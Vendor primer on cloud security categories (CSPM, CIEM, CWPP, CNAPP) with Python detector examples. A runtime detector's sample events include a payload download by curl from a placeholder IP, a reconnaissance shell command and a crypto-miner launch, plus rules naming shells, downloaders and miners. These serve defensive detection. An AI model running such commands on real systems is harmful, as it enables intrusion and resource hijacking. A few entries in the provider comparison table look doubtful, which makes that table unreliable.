Cloud Security 101

A Primer on CSPM, CIEM, CWPP and CNAPP
Contents

Cloud Security in View of Today's Realities
Shared Responsibility Model for the Cloud
Cloud Provider Security Tools Are Not Enough
Key Cloud Security Solution Categories: CSPM, CIEM, and CWPP
  What is CSPM?
  What is CIEM?
  What is CWPP?
CNAPP: Not Just Another Acronym
  What is CNAPP?
  CNAPP Has You Covered
Five key considerations when evaluating a cloud security solution
  #1 Choose an agentless + agent-based approach for comprehensive protection
  #2 Manage configuration and permission risk
  #3 Enable Cloud Security Monitoring with Audit Logs
  #4 Implement runtime detection and response
  #5 Map to the MITRE ATT&CK framework
Unified Container and Cloud Security with Sysdig
Appendix
Cloud Security in View of Today's Realities

Life was simpler when IT environments were restricted to on-premises data centers, self-contained fortresses with one way in and one way out. But these days, with more and more organizations moving business-critical applications and data to the cloud, and cybercriminals already hard at work there, detecting threats is less like defending an ancient fortress and more like securing Disneyland. Like an amusement park, distributed infrastructure based on cloud technologies consists of many attractions, multiple types of consumers, countless interactions, and varying entrances and exits. But there's nothing fun about it for SecDevOps, DevOps, and cloud security operations teams. In fact, with so many temptations for bad actors and so much at stake, it's an environment that demands highly intelligent security technologies and constant vigilance.

Organizational teams already have their hands full meeting customer demand and delivering on business objectives. The spectrum of threat actors exists nonetheless, and any organization's systems will inevitably be targeted, irrespective of company size or vertical.

The only sure thing is that, one day, an insecure configuration lurking deep within a cloud stack will wreak havoc, or a new type of threat will emerge to exploit a new vulnerability. It's inevitable. So, is cloud security possible, or is it pie in the sky?

Shared Responsibility Model for the Cloud

The first step in planning for cloud security is understanding the shared responsibility model. All major public clouds (e.g., AWS, Azure, GCP) use a shared security concept to distinguish between the security risks that the cloud provider manages and those that it expects customers to address.

Under this model, cloud providers are responsible for managing aspects of security on their end, such as securing the physical servers that host VM instances and storage buckets. They also perform regular audits of their systems. However, the burden of securing the resources that end users deploy in the cloud lies mostly with the end users themselves. At a minimum, cloud providers expect that the data you upload is protected by access controls as mandated by your compliance frameworks, and that you secure the OS running on a cloud VM instance. Where exactly the line falls depends on the service model: with IaaS you own the guest OS and everything above it, while with managed PaaS services the provider takes on the OS and runtime, but your data, your identities, and your configuration remain your responsibility in every model.

Cloud Security 101 3


Cloud Provider Security Tools Are Not Enough

The purpose of this document is not to highlight the security gaps of cloud service providers or their tools, which are both adding tremendous value in enterprise environments. Rather, it's to make the reader aware that security is an add-on for cloud providers, a secondary priority. Their main focus is to provide cloud computing, network, and storage services, not security.

Imagine you are just starting on your cloud adoption journey, and you only have a couple of IaaS or SaaS services running. You can easily implement security policies with tools provided by the public cloud providers that will alert your team to suspicious behavior: AWS Security Hub, AWS GuardDuty, Azure Security Center, Azure Defender, and Google Security Command Center are some good examples. But as the number of services you consume from cloud providers increases, the need to beef up security becomes more apparent (and urgent), and there is a good chance you end up realizing that these tools are not enough to secure your cloud environment. See the appendix below for a detailed comparison.

One more caveat: CSPs' security tools are a big source of vendor lock-in, as they compel you to stay with that provider because you are customizing your security controls with their tools. As you move into multi-cloud territory, you will need a solution that talks to all clouds and fills in the gaps that cloud providers can't or won't cover.



Key Cloud Security Solution Categories: CSPM, CIEM, and CWPP

Are your teams up to speed about security in the cloud? If not, you aren't alone. According to Gartner®, "50% of the participating organizations indicated that there is a lack of internal knowledge about security in cloud-native DevSecOps." [1] And this is happening as new terms, categories, and technologies are surfacing daily. But regardless of how many new buzzwords come along, there are three well-established cloud security categories to be aware of: CSPM, CIEM, and CWPP.

What is CSPM?

CSPM is a set of controls that detect when your deployed accounts and resources deviate from security best practices. The standards and benchmarks that make up the CSPM controls allow you to continuously evaluate all of your cloud accounts and workloads to quickly identify areas of cloud drift and platform misconfigurations. It provides actionable and prescriptive guidance on how to improve and maintain your organization's security posture.

Cloud Security Posture Management (CSPM) tools unify the security use cases of protecting the cloud control plane (by enabling monitoring for misconfigurations), tracking cloud resources, and verifying the configurations of the cloud tenant. These tools enhance cloud security by identifying insecure configurations, which enables organizations to address gaps and design a more secure architecture. Some CSPM solutions also offer remediation and other extended capabilities, though most organizations use CSPMs for compliance purposes and auditing only.

"Through 2025, more than 99% of cloud breaches will have a root cause of preventable misconfigurations or mistakes by end users." [2]

[1] Gartner, "Emerging Technologies: Future of Cloud-Native Security Operations," Mark Wah, Charlie Winckless, 17 November 2021.
[2] Gartner, "Hype Cycle™ for Cloud Security, 2021," Tom Croll, Jay Heiser, 27 July 2021.

* GARTNER® and HYPE CYCLE™ are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Cloud Security 101 5


CSPM tools check that cloud settings align with best practices. This lets cloud teams map their settings to out-of-the-box framework controls and benchmarks and save time when addressing things like:
• Data storage exposed directly to the internet
• Lack of encryption on databases
• Lack of multi-factor authentication on critical system accounts

By notifying teams when violations occur, CSPM tools enable teams to take action and prioritize remediation. One practical point: any CSPM rollout needs a way to record accepted exceptions (a bucket that is intentionally public, for example), otherwise long-known, signed-off findings drown out newly introduced drift.

Figure 1. Sysdig’s Insights dashboard shows a single view of risk across clouds and workloads.
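To make the three checks above concrete, here is an added example written for this edit (it is not code from the ebook or from Sysdig) of how a posture evaluation works: a set of controls run over a resource inventory, with an exception list for accepted findings and a comparison against the previous run to surface drift. The inventory shape, the control names, and the sample resources are constructed assumptions; a real CSPM fills the inventory from provider APIs such as AWS Config, Azure Resource Graph, or GCP Cloud Asset Inventory.

```python
"""Minimal CSPM-style posture evaluation over a constructed inventory.

Added example (not code from the ebook or from Sysdig). The inventory shape,
control names and the exception/baseline mechanism are assumptions; a real
CSPM fills the inventory from provider APIs such as AWS Config, Azure
Resource Graph or GCP Cloud Asset Inventory.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    resource: str
    control: str
    severity: str
    detail: str


# Constructed sample inventory (assumption: provider-neutral field names).
INVENTORY = {
    "storage_buckets": [
        {"name": "public-assets", "public_access": True},
        {"name": "customer-exports", "public_access": True},
        {"name": "build-cache", "public_access": False},
    ],
    "databases": [
        {"name": "orders-db", "encrypted_at_rest": False},
        {"name": "analytics-db", "encrypted_at_rest": True},
    ],
    "accounts": [
        {"name": "root", "privileged": True, "mfa_enabled": False},
        {"name": "ci-bot", "privileged": False, "mfa_enabled": False},
        {"name": "alice", "privileged": True, "mfa_enabled": True},
    ],
}

# Accepted exceptions: (resource, control) pairs that were reviewed and signed off.
# public-assets is a deliberately public CDN origin in this constructed example.
EXCEPTIONS = {("public-assets", "storage.no-public-access")}

# Findings from the previous evaluation, used to detect drift (constructed).
BASELINE = {
    ("orders-db", "database.encrypt-at-rest"),
    ("build-cache", "storage.no-public-access"),   # was public last run, fixed since
}

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


# Each control is a predicate over one resource returning a Finding or None.
def check_public_bucket(b):
    if b["public_access"]:
        return Finding(b["name"], "storage.no-public-access", "high",
                       "storage exposed directly to the internet")
    return None


def check_db_encryption(db):
    if not db["encrypted_at_rest"]:
        return Finding(db["name"], "database.encrypt-at-rest", "medium",
                       "encryption at rest is disabled")
    return None


def check_mfa(acct):
    # Only privileged accounts are in scope for this control.
    if acct["privileged"] and not acct["mfa_enabled"]:
        return Finding(acct["name"], "iam.mfa-on-privileged", "critical",
                       "privileged account without multi-factor authentication")
    return None


CONTROLS = {
    "storage_buckets": check_public_bucket,
    "databases": check_db_encryption,
    "accounts": check_mfa,
}


def evaluate(inventory, exceptions=frozenset()):
    """Run every control over every resource, dropping documented exceptions.

    Findings come back ordered by severity, so the top of the list is what to fix first.
    """
    findings = []
    for kind, check in CONTROLS.items():
        for resource in inventory.get(kind, []):
            finding = check(resource)
            if finding and (finding.resource, finding.control) not in exceptions:
                findings.append(finding)
    findings.sort(key=lambda f: (SEVERITY_RANK[f.severity], f.resource))
    return findings


def drift(baseline, findings):
    """Compare this run's (resource, control) pairs with the previous run's."""
    current = {(f.resource, f.control) for f in findings}
    return {"new": sorted(current - baseline), "resolved": sorted(baseline - current)}


if __name__ == "__main__":
    results = evaluate(INVENTORY, EXCEPTIONS)
    for f in results:
        print(f"[{f.severity:8}] {f.control:26} {f.resource}: {f.detail}")
    print("drift:", drift(BASELINE, results))
```

The exception list is keyed on the (resource, control) pair rather than the resource alone, so a bucket that is allowed to be public is still reported if it fails a different control. The drift output is what a team actually wants in a daily report: what appeared since yesterday and what got fixed, not the full list every time.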



What is CIEM?

Granting excessive permissions and entitlements to cloud resources is one of the most common misconfiguration problems. With the explosion of cloud identities, both human and non-human, implementing the least-privilege principle becomes very complex in a dynamic cloud environment. In addition, as cloud providers keep adding services and features, it becomes increasingly difficult to know exactly what those least-privilege settings are.

Cloud Infrastructure Entitlement Management (CIEM) tools address this issue by detecting over-permissioned accounts and roles, unused permissions, and unused accounts. With CIEM, you not only know which human and non-human identities can access which resources, but which permissions they are actually using on a daily basis. Armed with this knowledge, you can modify policy to enforce least-privilege access. One caveat: usage-based right-sizing is only as good as its observation window, so it has to be long enough to capture legitimate but infrequent actions such as quarterly jobs or disaster-recovery drills before a permission is declared unused.

Let's say we have a group of users who are part of a project. These users are responsible for uploading images into a repository and running those containers in cloud instances, as well as for a number of auto-scaling actions. There's no need for them to have all the permissions an administrator has, even though that approach may be the simplest to configure. Are they going to be deleting VPCs? That is not one of their tasks. Using CIEM tools to get rid of excessive permissions is an important step in reducing collateral damage from credential theft.

Figure 2. A CIEM dashboard should suggest policies to enforce least privilege.
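The project-team scenario above, worked through as an added example (written for this edit, not code from the ebook or from Sysdig): granted permissions are compared with the actions actually observed in audit logs over a window, and the result is a list of grants to remove, wildcard grants to narrow, high-risk actions a stolen credential could still reach (the "deleting VPCs" question), and a right-sized policy. The role names, the AWS-style "service:Action" strings, the wildcard semantics, and the log events are constructed assumptions.

```python
"""Usage-based least-privilege analysis in the style of a CIEM tool.

Added example (not code from the ebook or from Sysdig). The role names, the
AWS-style "service:Action" strings, the wildcard semantics and the audit-log
event shape are assumptions; a CIEM product derives the same inputs from the
provider's IAM policies and audit logs.
"""
import fnmatch
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: what each role is allowed to do (wildcards as in AWS IAM).
GRANTED = {
    "project-team": ["ecr:*", "ec2:*", "autoscaling:*", "iam:PassRole", "s3:*"],
    "legacy-deployer": ["ec2:*", "s3:*"],
}

# Actions that would hurt if a stolen credential reached them (assumption).
HIGH_RISK = ["ec2:DeleteVpc", "iam:CreateAccessKey", "s3:DeleteBucket"]

# Constructed audit-log events: (timestamp, role, action actually called).
NOW = datetime(2022, 4, 1)
EVENTS = [
    (NOW - timedelta(days=1), "project-team", "ecr:GetAuthorizationToken"),
    (NOW - timedelta(days=1), "project-team", "ecr:PutImage"),
    (NOW - timedelta(days=2), "project-team", "ec2:RunInstances"),
    (NOW - timedelta(days=3), "project-team", "ec2:DescribeInstances"),
    (NOW - timedelta(days=5), "project-team", "autoscaling:UpdateAutoScalingGroup"),
    (NOW - timedelta(days=8), "project-team", "iam:PassRole"),
    (NOW - timedelta(days=200), "legacy-deployer", "ec2:RunInstances"),  # outside window
]

OBSERVATION_WINDOW = timedelta(days=90)


def covers(pattern, action):
    """True when an IAM-style pattern such as 'ec2:*' grants the concrete action."""
    return fnmatch.fnmatchcase(action, pattern)


def used_actions(events, now=NOW, window=OBSERVATION_WINDOW):
    """Collect the concrete actions each role called inside the observation window."""
    used = defaultdict(set)
    for ts, role, action in events:
        if now - ts <= window:
            used[role].add(action)
    return used


def analyse(granted, used):
    """Per role: what is used, what is granted but never used, and a right-sized policy."""
    report = {}
    for role, patterns in granted.items():
        seen = used.get(role, set())
        unused = [p for p in patterns if not any(covers(p, a) for a in seen)]
        broad = [p for p in patterns if "*" in p and p not in unused]
        exposed = [a for a in HIGH_RISK
                   if a not in seen and any(covers(p, a) for p in patterns)]
        report[role] = {
            "dormant": not seen,                 # no activity at all in the window
            "used": sorted(seen),
            "unused_grants": unused,             # remove outright
            "broad_grants_in_use": broad,        # replace with the concrete actions
            "reachable_high_risk": exposed,      # what a credential thief could do today
            "recommended_policy": sorted(seen),  # exactly the observed actions
        }
    return report


if __name__ == "__main__":
    for role, r in analyse(GRANTED, used_actions(EVENTS)).items():
        print(role, r)
```

Note that "ec2:*" shows up as in use (RunInstances and DescribeInstances were called) and yet still reaches ec2:DeleteVpc, which nobody called. That is the case a CIEM tool exists to catch: a grant is not safe just because it is exercised, it has to be narrowed to the actions that were actually observed.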



What is CWPP?

Cloud Workload Protection Platform (CWPP) tools protect workloads. Specifically, they focus on securing the whole application lifecycle, providing cloud-based security solutions that protect instances on AWS, Google Cloud Platform (GCP), Microsoft Azure, and other cloud vendors' platforms. CWPP solutions are built for specific use cases:
• Runtime detection: Detect suspicious behavior of applications at runtime and automate the response to threats.
• System hardening: Prevent security risk by eliminating potential attack vectors and reducing the system's attack surface.
• Vulnerability management: Detect OS and non-OS vulnerabilities, prioritize those with known exploits, and keep workloads compliant with regulatory requirements.
• Network security: Visualize network traffic inside containers and Kubernetes, and enforce Kubernetes-native network segmentation.
• Compliance: Ensure production workloads comply with regulatory standards.
• Incident Response: Respond to security incidents using evidence from forensics to help you contain the breach.

CNAPP: Not Just Another Acronym

As the cloud-native application space evolves, more moving parts are inevitably introduced. Thankfully, the industry is using a modular approach with cloud-native technologies. As such, existing CI/CD pipelines and runtime platforms can be extended and updated as better methods are discovered.

The downside of all this modularity is complexity. It can be daunting to figure out what to introduce in the application lifecycle in order to get a reasonable level of security policy and enforcement in place. And that's where a Cloud Native Application Protection Platform (CNAPP) comes into play. Leveraging a CNAPP gives you in-depth, multi-layered, agent-based, and agentless coverage across all aspects of your environment, everything from proactive validation of workloads to auditing policies on the public cloud platform you're running on.


What is CNAPP?

CNAPP is the umbrella security category that covers the use cases that would otherwise fall into the CSPM and CWPP categories. According to Gartner,

"Cloud-native application protection platform (CNAPP) provides more than CWPP-CSPM convergence: There are two important drivers for CNAPP. Firstly, CWPP vendors are looking to posture to provide workload context. Secondly, CSPMs are challenged to provide more and more visibility while "drilling down" into the workload. CNAPP integrates CSPM and CWPP to offer both, and potentially augments them with additional cloud security capabilities." [3]

One side benefit of a CNAPP is that it allows customers and vendors to readily see the value that cloud security suites can deliver, as opposed to a series of point solutions that need to be painstakingly integrated.

A CNAPP encapsulates five core capabilities from development to production and back to development. These are:
• Development artifact scanning
• Cloud Security Posture Management (CSPM)
• Infrastructure as Code (IaC) scanning
• Cloud Infrastructure Entitlement Management (CIEM)
• Runtime cloud workload protection platform (CWPP)

A CNAPP provides a feedback loop that enables true end-to-end coverage of a cloud-native application lifecycle.

Figure 3. The relationship between key cloud security solution product categories.

[3] Gartner, Inc., "How to Protect Your Clouds with CSPM, CWPP, CNAPP, and CASB," Richard Bartley, 6 May 2021.


CNAPP Has You Covered

Implementing a CNAPP can give you dramatically better visibility and control of the entire cloud-native application stack. The alternative is a hodgepodge of point solutions that require inordinate amounts of time and effort to consolidate and correlate data across the organization's entire technology landscape, still without knowing conclusively that all areas are covered.

A CNAPP is designed to provide that comprehensive coverage. In addition, a true CNAPP solution can reveal interrelationships between the insights of various use cases and promote collaboration between SecDevOps, DevOps, and cloud security operations teams. It can be the equalizer when it comes to providing real-time knowledge of the cloud environment and incorporating common workflows, data correlations, meaningful insights, and remediation.

By implementing a CNAPP, you can achieve a higher level of security across all major aspects of your cloud-native application stack. And by embedding CNAPP security from the earliest stages of the development process all the way into production, you can ensure that what is delivered maintains a high level of security and integrity.


Five key considerations when evaluating a cloud security solution

Security tools provided by CSPs offer a wide array of functionalities. Plentiful as they are, most of these tools are geared toward their own cloud environments. Getting everything integrated, especially if you're working with hybrid and multi-cloud architectures as many organizations do, requires a lot of work on the part of cloud engineers and security engineers. At times like this, you'd want to consider a third-party solution, a CWPP or CNAPP tool, rather than native CSP tooling.

Below are five key points to consider when evaluating a third-party solution:

#1 Choose an agentless + agent-based approach for comprehensive protection

When evaluating security tools designed for the cloud, and depending on the service you consume from the cloud provider (IaaS, CaaS, PaaS, FaaS, etc.), you will come across agentless approaches, agent-based approaches, and approaches that combine both. Agentless deployments are easier, require minimal management overhead, impose little to no performance overhead, and can accommodate systems that can't handle agents. Agent-based approaches provide much deeper visibility that facilitates more comprehensive context and real-time detection, enabling faster incident response, containment, and investigation. But agents are more difficult and time-consuming to manage.

Despite their drawbacks, software agents are likely to play key roles in the cloud for years to come. While agentless security methods can easily access uniform, API-based cloud control planes to identify many types of problems, and they enable quick and easy onboarding, they should be part of a multi-layered defensive strategy that contains both agent-based and agentless technologies. Otherwise, there will be gaps in visibility and solution coverage.

Agentless approaches are effective for inventorying the cloud services your team is using and identifying known vulnerabilities in software. They can also allow your teams to detect threats based on logs. Agent-based approaches, by contrast, deliver real-time detection of runtime threats, malware, and advanced persistent threats. Once you detect a threat, the detailed activity record and context an agent provides is critical for incident response, containment, and forensic investigation. Effectively managing security risk requires using both approaches.

#2 Manage configuration and permission risk

Ensure you have full visibility into cloud assets, identifying misconfigurations and drift across multi-cloud environments. Implement the least-privilege principle by detecting and removing excessive permissions on user roles, human and non-human. Look for tools that can not only automatically discover all identity and access management roles and their permission configurations, but also detect roles with excess permissions and recommend the right permission settings.


#3 Enable Cloud Security Monitoring with Audit Logs

Cloud security monitoring is the first crucial step toward keeping track of potential security threats within a sprawling, multi-layered cloud environment. Audit logs systematically record actions within a cloud environment as the actions take place. They tell you who did what, when it happened, and what changed. If someone creates a user, changes permissions, or spins up a new instance, it will be traced in those logs.

All of the major public cloud providers offer native services to enable audit logging and help you track the logs. Examples are AWS CloudTrail, Cloud Audit Logs in GCP, and Azure audit logs. Almost anything happening in a cloud environment is tracked and logged in cloud audit logs, with one caveat worth checking in your own accounts: data-plane operations such as individual object reads from storage are typically not logged by default and have to be enabled separately, so a detection that depends on them stays silent until they are. By analyzing these audit logs, you can detect unexpected behavior, configuration changes, intrusions, and data theft. However, these services typically work only with individual cloud accounts and individual clouds. If you're like the 93 percent of organizations today that use multiple clouds at the same time, a third-party tool is necessary. Third-party tools aggregate cloud audit logs from across various cloud environments so you can analyze them centrally and detect suspicious patterns within audit data from any public cloud environment.

Falco Takes Auditing Further

Stream detection is a continuous process that collects, analyzes, and reports on data in motion. Based on that idea, the open source community offers a solution: Falco.

Connecting Falco to cloud audit logs allows you to identify unexpected changes to permissions and service access rights, as well as unusual activity that can indicate the presence of an intruder or data exfiltration. It doesn't require you to ship logs into an external repository for threat detection, so you don't incur the bandwidth and storage costs of doing so.
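What "stream detection over audit logs" looks like in practice, as an added example written for this edit (it is not code from the ebook, from Sysdig, or from the Falco project, and it does not use Falco's rule language): events are evaluated one at a time as they arrive, with a little state kept between them. Two rules are stateless (a permission or credential change; a bucket ACL opened to the public) and one is stateful (a burst of object reads from a source IP the principal has never used, which is the exfiltration pattern the Falco sidebar above refers to). The events are constructed with a simplified CloudTrail-like shape; the thresholds and the per-principal IP baseline are assumptions.

```python
"""Stream detection over cloud audit-log events, in the spirit of Falco's
cloud audit plugins.

Added example (not code from the ebook, Sysdig or the Falco project). The
events are constructed with a simplified CloudTrail-like shape; the rule
thresholds and the per-principal IP baseline are assumptions.
"""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Control-plane calls that change who can do what (assumption: a short list
# of AWS IAM event names; a production rule set is much longer).
PERMISSION_CHANGE = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile", "AttachUserPolicy",
    "PutUserPolicy", "AttachRolePolicy", "PutRolePolicy", "UpdateAssumeRolePolicy",
}
PUBLIC_ACLS = {"public-read", "public-read-write", "authenticated-read"}

ALICE = "arn:aws:iam::123456789012:user/alice"

# Baseline of source IPs each principal has used before, learned offline from
# historical logs (constructed). It is deliberately NOT updated from the live
# stream, so an intruder cannot become "known" simply by being persistent.
BASELINE = {ALICE: {"203.0.113.10"}}


class AuditStreamDetector:
    def __init__(self, baseline, read_threshold=3, window=timedelta(minutes=5)):
        self.baseline = baseline
        self.read_threshold = read_threshold
        self.window = window
        self.reads = defaultdict(deque)   # (principal, ip) -> recent GetObject times
        self.exfil_reported = set()       # one exfiltration alert per (principal, ip)

    def process(self, raw_event):
        """Evaluate one event as it arrives; return the alerts it triggers."""
        ev = json.loads(raw_event)
        ts = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        who = ev["userIdentity"]["arn"]
        ip = ev["sourceIPAddress"]
        name = ev["eventName"]
        params = ev.get("requestParameters", {})
        alerts = []

        # Rule 1: any change to permissions or credentials is always reported.
        if name in PERMISSION_CHANGE:
            alerts.append(("permission_change", who, name))

        # Rule 2: a bucket ACL that opens data to everyone.
        if name == "PutBucketAcl" and params.get("x-amz-acl") in PUBLIC_ACLS:
            alerts.append(("bucket_made_public", who, params.get("bucketName")))

        # Rule 3: a burst of object reads from an IP this principal has never used.
        if name == "GetObject":
            key = (who, ip)
            recent = self.reads[key]
            recent.append(ts)
            while recent and ts - recent[0] > self.window:   # slide the window
                recent.popleft()
            unfamiliar = ip not in self.baseline.get(who, set())
            if unfamiliar and len(recent) >= self.read_threshold and key not in self.exfil_reported:
                alerts.append(("possible_exfiltration", who, ip))
                self.exfil_reported.add(key)
        return alerts


def _event(time, name, ip, **params):
    # Builds a constructed event; real CloudTrail records carry many more fields.
    return json.dumps({"eventTime": time, "eventName": name, "sourceIPAddress": ip,
                       "userIdentity": {"arn": ALICE}, "requestParameters": params})


# Constructed scenario: alice works from her usual IP, then her stolen credential
# is used from a new IP to mint a key, pull objects, and open the bucket.
SAMPLE_EVENTS = [
    _event("2022-04-01T10:00:00Z", "ListBuckets", "203.0.113.10"),
    _event("2022-04-01T10:01:00Z", "GetObject", "203.0.113.10", bucketName="customer-exports"),
    _event("2022-04-01T10:05:00Z", "CreateAccessKey", "198.51.100.7", userName="alice"),
    _event("2022-04-01T10:05:30Z", "GetObject", "198.51.100.7", bucketName="customer-exports"),
    _event("2022-04-01T10:06:00Z", "GetObject", "198.51.100.7", bucketName="customer-exports"),
    _event("2022-04-01T10:06:30Z", "GetObject", "198.51.100.7", bucketName="customer-exports"),
    _event("2022-04-01T10:07:00Z", "PutBucketAcl", "198.51.100.7",
           bucketName="customer-exports", **{"x-amz-acl": "public-read"}),
]


def run(raw_events, baseline=BASELINE):
    """Feed events through one detector instance and collect every alert."""
    detector = AuditStreamDetector(baseline)
    alerts = []
    for raw in raw_events:
        alerts.extend(detector.process(raw))
    return alerts


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

Rule 3 only fires if GetObject events are present at all, which is exactly the data-plane logging caveat noted above: with object-level events disabled, the same credential theft would surface only through the CreateAccessKey and PutBucketAcl alerts.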



#4 Implement runtime detection and response

Act fast on early indicators of compromise. Runtime threats are real and growing in sophistication. Adversaries are launching complex attacks to evade detection while infecting systems for maximum gain. Don't miss real-time signals. Get deep visibility into events to detect suspicious behavior and malicious activity in the cloud, containers, and Kubernetes. Make sure you have the ability to collect detailed forensic evidence in case an incident occurs and the container is gone: a short-lived container takes its filesystem and process state with it when it exits, so the activity record has to be captured at detection time rather than reconstructed afterwards.

#5 Map to the MITRE ATT&CK framework

All major cloud service providers offer native security tools to harden their compute services and environments; however, each of these services is slightly different from the others. Therefore, a common language is needed when talking about cloud security. Adopting a unified security framework will make it easier for security engineers to manage cloud breaches and provide a foundation for threat models and methodologies.

The MITRE ATT&CK framework is a comprehensive knowledge base that categorizes adversary behavior in a way that helps cybersecurity teams fortify their infrastructure. It catalogs the tactics, techniques, and procedures (TTPs) that threat actors have been observed using in real attacks. The MITRE ATT&CK framework serves as a foundation for threat models and methodologies. It can also give you a head start on compliance work, since it guides your cybersecurity and risk teams toward established best practices.

MITRE ATT&CK for cloud maps the specific TTPs that advanced threat actors could use in their attacks on cloud environments.

Unified Container and Cloud Security with Sysdig

Sysdig is driving the standard for securing the cloud, empowering organizations to confidently protect containers, Kubernetes, and cloud services. The Sysdig platform enables teams to secure the build, detect and respond to runtime threats, and continuously manage cloud configurations, permissions, and compliance. It's the ideal solution for end-to-end cloud infrastructure security.

Experience the visibility and security value first hand in your own cloud and container environment. Watch How to Get Started with Sysdig Secure, and start a free, 30-day trial.
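The runtime detection and evidence-capture points in #4, the ATT&CK mapping in #5, and the runtime detection use case in the CWPP list earlier are tied together in the following added example, written for this edit (it is not code from the ebook, from Sysdig, or from Falco). It evaluates a constructed stream of container process events of the kind an agent derives from execve and open system calls, reconstructs the process lineage for each alert, snapshots the container's recent activity as evidence at detection time, and tags each alert with an ATT&CK technique ID. The container names, the rules, the shell allowlist, and the choice of technique IDs are assumptions made for illustration.

```python
"""Container runtime detection with evidence capture and MITRE ATT&CK tagging.

Added example (not code from the ebook or from Sysdig, and not Falco's rule
language). The process events are constructed to resemble what an agent sees
from execve/open system calls; the rules, the allowlist and the choice of
technique IDs are assumptions made for illustration.
"""
from collections import defaultdict, deque

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
MINERS = {"xmrig", "minerd"}
# Containers where interactive shells are normal, e.g. CI runners (assumption).
SHELL_EXPECTED = {"ci-runner"}

# Rule name -> ATT&CK technique ID: the common language asked for in #5.
TECHNIQUES = {
    "shell spawned in container": "T1059",           # Command and Scripting Interpreter
    "download tool launched in container": "T1105",  # Ingress Tool Transfer
    "crypto-miner process in container": "T1496",    # Resource Hijacking
}


class RuntimeDetector:
    def __init__(self, evidence_depth=16):
        self.procs = defaultdict(dict)   # container -> pid -> execve event
        # Per-container ring buffer; the evidence outlives the container itself.
        self.recent = defaultdict(lambda: deque(maxlen=evidence_depth))
        self.alerts = []

    def lineage(self, container, pid):
        """Walk ppid links to render 'parent(pid) > child(pid)' for the alert."""
        chain, procs = [], self.procs[container]
        while pid in procs:
            chain.append(f"{procs[pid]['comm']}({pid})")
            pid = procs[pid]["ppid"]
        return " > ".join(reversed(chain))

    def _raise(self, ev, rule):
        self.alerts.append({
            "rule": rule,
            "technique": TECHNIQUES[rule],
            "container": ev["container"],
            "lineage": self.lineage(ev["container"], ev["pid"]),
            "cmdline": ev["cmdline"],
            # Snapshot now: once the container is gone there is nothing left to collect.
            "evidence": list(self.recent[ev["container"]]),
        })

    def process(self, ev):
        c = ev["container"]
        self.recent[c].append(ev)
        if ev["type"] != "execve":
            return                      # file/network events are kept as evidence only
        self.procs[c][ev["pid"]] = ev
        parent = self.procs[c].get(ev["ppid"])
        comm = ev["comm"]
        # A shell whose parent is an application process (not another shell, and
        # not the container entrypoint) is how most interactive intrusions start.
        if comm in SHELLS and c not in SHELL_EXPECTED and parent and parent["comm"] not in SHELLS:
            self._raise(ev, "shell spawned in container")
        if comm in DOWNLOADERS:
            self._raise(ev, "download tool launched in container")
        if comm in MINERS:
            self._raise(ev, "crypto-miner process in container")


def _exec(container, pid, ppid, comm, cmdline):
    return {"type": "execve", "container": container, "pid": pid, "ppid": ppid,
            "comm": comm, "cmdline": cmdline}


# Constructed event stream: a web container compromised after a shell is spawned
# from the node process, alongside a CI runner where shells are expected.
SAMPLE_EVENTS = [
    _exec("web-7f9c", 1, 0, "node", "node server.js"),
    _exec("ci-runner", 1, 0, "runner", "/runner"),
    _exec("ci-runner", 10, 1, "bash", "bash -e build.sh"),
    _exec("web-7f9c", 42, 1, "sh", "sh -c 'id; uname -a'"),
    _exec("web-7f9c", 43, 42, "curl", "curl -o /tmp/kit http://203.0.113.5/kit"),
    {"type": "open", "container": "web-7f9c", "pid": 43, "path": "/tmp/kit", "flags": "w"},
    _exec("web-7f9c", 44, 42, "xmrig", "/tmp/kit/xmrig -o pool:3333"),
]


def run(events):
    """Feed events through one detector and return the alerts it raised."""
    detector = RuntimeDetector()
    for ev in events:
        detector.process(ev)
    return detector.alerts


if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(a["technique"], a["rule"], a["container"], a["lineage"])
```

The lineage string is what makes the alert actionable: "node(1) > sh(42) > curl(43)" tells the responder the web application itself spawned the shell, which points at an application-layer compromise rather than an operator who exec'd in. The evidence snapshot is copied at alert time for the same reason the text gives, the container may not exist by the time anyone looks.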


Appendix

Comparison table of security capabilities in the three major public cloud providers. Product names are as of this document's publication (2022); several have since been renamed (for example, Azure Security Center is now Microsoft Defender for Cloud, Azure Sentinel is Microsoft Sentinel, and Stackdriver is Cloud Monitoring and Cloud Logging).

Service | AWS | Azure | GCP
--- | --- | --- | ---
DevOps Lifecycle | | |
CI/CD | AWS CodeBuild, AWS CodeDeploy, AWS CodePipeline | Azure DevOps, GitHub Enterprise | Cloud Build
Provisioning templates | CloudFormation | Azure Resource Manager | Cloud Deployment Manager
Service Catalog | AWS Service Catalog | Azure Custom Images, Azure API Management | Private Catalog
Security Assessment | Inspector | Security Center - Resource Security Hygiene | Cloud Security Command Center
Serverless Code | Lambda | Azure Functions | Cloud Functions
Insights | Systems Manager | Monitor | Stackdriver Monitoring
Detection | | |
DLP | Macie | Azure Information Protection | Cloud DLP
Anomaly Detection | GuardDuty | Stream Analytics | Cloud Dataflow
Vulnerability Scan | Inspector | Security Center | Scanner
Protection | | |
DDoS | Shield | DDoS Protection | Preset
MFA | Multi-Factor Auth | Azure MFA | Cloud Identity-Aware Proxy
Web App FW | WAF | Azure WAF, Application Gateway | Cloud Armor
IAM | AWS Identity & Access Management, Cognito | Azure AD/IAM | Cloud Identity and Access Management
Key Management | KMS | Azure Key Vault | Cloud KMS
Audit | | |
Log Management | CloudTrail | Azure Audit Logs | Cloud Audit Logs
Config Management | Config | Azure Security Control | Cloud Asset Inventory
Compliance | CloudHSM | Azure Trust Center and Key Vault | GCP Security
Service Catalog | Service Catalog | Managed Applications | Service Catalog
Security Monitoring | | |
SIEM | CloudWatch and Amazon GuardDuty | Azure Sentinel and Azure Monitor | Stackdriver Monitoring/Logging, Chronicle
